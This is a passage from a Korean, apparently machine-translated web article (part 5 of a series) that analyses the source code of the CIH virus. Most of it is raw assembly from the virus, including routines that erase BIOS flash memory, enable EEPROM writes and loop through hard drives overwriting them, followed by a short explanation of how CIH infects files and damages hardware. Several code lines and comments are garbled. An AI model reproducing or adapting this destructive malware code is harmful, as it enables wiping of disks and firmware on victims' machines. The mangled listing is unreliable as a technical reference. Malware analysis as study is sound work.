바이러스 프로그램 소스코드 예시 분석-CIH 바이러스[5]
push ecx
loop $
; BIOS에서 추가 000E0000 - 000E007F 세그먼트 ROM 데이터를 삭제합니다. 총 80시간 바이트입니다.
xor ah, ah
mov [eax], al
xchg ecx, eax
loop $
; BIOS의 000E0000 - 000FFFFF 세그먼트 데이터를 표시하고 활성화합니다. 총 128KB입니다. 이 세그먼트는 mov eax, 0f5555h 정보를 쓸 수 있습니다.
Pop ecx
mov ch, 0aah
call ebx
mov byte ptr [eax], 20h
loop $
000FE000 - 000FE07F 세그먼트 데이터 삭제; BIOS의 총 80h 바이트
mov ah, 0e0h
mov [eax], al
; BIOS의 000F0000 - 000FFFFF 섹션 숨기기, 총 64KB
mov word ptr ( BooleanCalculateCode-@10) [esi], 100ch
esi 호출
모든 하드 드라이브 삭제
KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDiskNumber
push ebx
sub esp, 2ch
push 0c0001000h
mov bh, 08h
push ebx
push ecx
push ecx
push ecx
push 40000501h
inc ecx
push ecx
push ecx
mov esi, esp
sub esp, 0ach
루프를 파괴
LoopOfKillHardDisk:
int 20h
dd 00100004h
cmp word ptr [esi+06h], 0017h
je KillNextDataSection
;ChangeNextHardDisk:
inc byte ptr [esi+4dh]
jmp LoopOfKillHardDisk
;다음 영역 파괴
KillNextDataSection:
add dword ptr [esi+10h], ebx
mov byte ptr [esi+4dh], FirstKillHardDiskNumber
jmp LoopOfKillHardDisk
EEPROM을 활성화하여 정보 쓰기
EnableEEPROMToWrite:
mov [eax], cl
mov [ecx], al
mov byte ptr [eax], 80h
mov [eax ], cl
mov [ecx], al
ret
IOForEEPROM:
@10 = IOForEEPROM
xchg eax, edi
xchg edx, ebp
출력 dx, eax
xchg eax, edi
al , 44h
xchg eax, edi
xchg edx, ebp
출력 dx, eax
xchg eax, edi
, al
ret
;정적 데이터 정의
LastVxdCallAddress = IFSMgr_Ring0_FileIO;마지막 호출된 Vxd 명령어 주소
VxdCallAddressTable DB 00h
db IFSMgr_RemoveFileSystem ApiHook-_PageAllocate
db UniToBCSPath- IFSMgr_RemoveFileSystemApiHook
db IFSMgr_Ring0_FileIO-UniToBCSPath ;각 Vxd 호출 명령어의 주소 차이
xd의 호출 번호
VxdCallTable 크기 = ($-VxdCallIDTable)/04h ; 프로그램
;바이러스 버전 및 저작권 정보 정의
VirusVersionCopyright db 'CIH v';CIH 바이러스 식별
db MajorVirusVersion+'0';기본 버전 번호
에 사용된 Vxd 호출 횟수 db '.'
db MinorVirusVersion+'0' ; 마이너 버전 번호
db ' TATUNG' ; 바이러스 크기
VirusSize = $ + SizeOfVirusCodeSectionTableEndMark(04h) + NumberOfSections *SizeOfVirusCodeSectionTable(08h)
+ SizeOfTheFirstVirusCodeSectionTable(04h)
; 동적 데이터 정의
VirusGameDataStartAddress = VirusSize
@6 = VirusGameDataStartAddress ; 바이러스 데이터 시작 주소
OnBusy db 0; "사용 중" 플래그
FileModificationTime dd ? DataBuffer
NumberOfSections dw ? 파일 시간
SymbolsPointer dd ? dd ? SizeOfOptionalHeader dw ? ;선택적 헤더의 길이
_Characteristics dw ? ;문자 집합 플래그
매직 dw ;플래그 단어(항상 010bh)
링커 버전 번호
SizeOfCode ?
SizeOfInitializedData dd ? 초기화되지 않은 데이터 블록 크기
BaseOfCode dd ;
BaseOfData dd ? 데이터 섹션 시작 RVA
ImageBase dd ? 기본 주소 로드 RVA
@9 = $
SectionAlignment dd ;FileAlignment dd ? alignment
OperatingSystemVersion dd ? 필수 운영 체제 버전 번호
ImageVersion dd ? 사용자 정의 버전 번호
SubsystemVersion dd ? 필수 하위 시스템 버전 번호
Reserved dd ? ; 파일의 각 부분의 총 길이
SizeOfHeaders dd ? 파일 헤더 크기
SizeOfImageHeaderToRead = $-NumberOfSections
NewAddressOfEntryPoint = DataBuffer
SizeOfImageHeaderToWrite = 04h
StartOfSectionTable=@9 > PointerToRawData = StartOfSectionTable+14h; 블록 물리적 오프셋
PointerToRelocations = StartOfSectionTable+18h; 재배치 오프셋
PointerToLineNumbers = StartOfSectionTable+1ch; 줄 번호 테이블 오프셋
NumberOfRelocations = StartOfSectionTable+20h; NumberOfLinenNmbers = StartOfSectionTable+22h ; 행 번호 테이블 수
Characteristics = StartOfSectionTable+24h ; 블록 속성
SizeOfScetionTable = Characteristics+04h-SectionName ; 메모리 양 바이러스에 필요함
VirusNeedBaseMemory = $
VirusNeedBaseMemory = $
VirusTotalNeedMemory = @9
; + SizeOfVirusCodeSectionTableEndMark(04h)
+ NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
; END FileHeader
위의 코드 분석 과정을 통해 CIH 바이러스는 명확한 구조와 뚜렷한 계층을 가지고 있음을 알 수 있습니다. 이 바이러스 프로그램의 백본 구조는 바이러스의 세부 사항이 win95 방식에 따라 처리되고 모든 시스템 호출이 Vxd를 사용하여 이루어진다는 점을 제외하면 DOS 바이러스의 백본 구조와 매우 유사합니다. 이는 Windows에서 API 기능을 사용하는 것과 비교하여 바이러스 프로그램을 더 낮은 수준으로, 더 효율적으로 만들고, 인터럽트를 사용하는 것에 비해 바이러스 자체의 복잡한 재배치 프로세스를 고려할 필요가 없으며 더 잘 예방할 수 있습니다. 프로그램 추적.
CIH 바이러스에는 두 가지 혁신이 있습니다. 하나는 바이러스가 감염되면 감염된 파일의 블록 사이의 빈 공간을 찾아 그 안에 바이러스 고유의 다양한 데이터 구조와 코드를 쓰는 것입니다. 충분하지 않으며 전염성이 없으므로 일부 파일이 감염되지 않는 이유 중 하나입니다.) 둘째, 바이러스는 공격할 때 플래시 메모리를 태울 뿐만 아니라 하드 디스크를 파괴하여 컴퓨터 하드웨어를 손상시킬 수 있습니다.
보안상의 이유로 바이러스 공격을 유발하고 하드웨어를 손상시키는 코드 부분에 대한 자세한 분석을 제공하지 않았습니다.
위 내용은 바이러스 프로그램 소스코드 예제 분석-CIH 바이러스[5]의 내용이며, 더 많은 관련 내용은 PHP 중국어 홈페이지(www. php.cn)!